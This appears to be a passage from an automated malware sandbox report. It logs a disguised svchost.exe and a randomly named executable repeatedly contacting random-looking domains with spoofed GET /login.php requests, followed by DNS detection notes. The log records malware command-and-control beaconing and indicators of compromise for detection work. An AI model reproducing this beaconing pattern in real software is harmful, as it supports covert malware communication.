Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731347439.3564880
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731347439.2338786
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731347439.2338786
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
